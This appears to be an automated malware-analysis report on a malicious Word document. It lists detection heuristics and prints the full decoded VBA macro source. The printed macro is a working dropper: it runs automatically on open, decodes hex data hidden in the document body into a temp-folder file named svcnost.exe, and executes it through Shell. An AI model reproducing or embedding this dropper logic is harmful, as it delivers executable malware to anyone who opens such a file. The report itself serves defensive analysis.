MALICIOUS
214
Risk Score
Heuristics 10
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell utututut, iR3t + 1 - 1 -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
tmm1 = Environ("T" & strTitle) -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1586 bytes |
SHA-256: 9bea84b68819b55860b13a12342e7b040182f449e392137adba8e1158fb07991 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
networkk
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Sub networkk()
Dim zzzzz
zzzzz = "sdfs4738946789045643728945764738495864378467fsd"
Dim tmm1
Dim t7nb
Dim bywr
Dim li7np9f
Dim iR3t As Integer
Dim strPrompt As String
Dim strTitle As String
Dim ddddd
ddddd = ActiveDocument.Range.Text
strPrompt = "fsgsrg343454t4t rga dfgs3dfgsdf g" & "fa44tggsr3tsdgsg fgs fsgdf"
strTitle = "sdfgsr3333edfgsdf324234"
strTitle = "E" & "M" & "P"
tmm1 = Environ("T" & strTitle)
strTitle = "x" & "e"
t7nb = tmm1 & "sv" & "c" & "no" & "st.e" & strTitle
Dim Data
Data = Replace(ddddd, " ", "1")
zzzzz = "sdfs4738946789045643728945764738495864378467fsd"
Dim sop
Dim sop22
Dim Symbol
Dim utututut
Dim byswr
strTitle = "8"
sop = InStr(12, Data, "5" & "67" & strTitle)
sop22 = InStr(12, Data, "99" & "997" & strTitle)
byswr = sop + 2 + 22 - 20
i7np9f = FreeFile
Open t7nb For Binary Lock Write As #i7np9f
While (byswr < sop22)
Symbol = Mid(Data, byswr, 902 - 900)
zzzzz = "123123123123"
strTitle = "H"
Put #i7np9f, , CByte("&" & strTitle & Symbol)
byswr = byswr + 5 - 3
Wend
iR3t = 1
Close #i7np9f
utututut = t7nb
Shell utututut, iR3t + 1 - 1
End Sub
Private Sub Document_New()
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.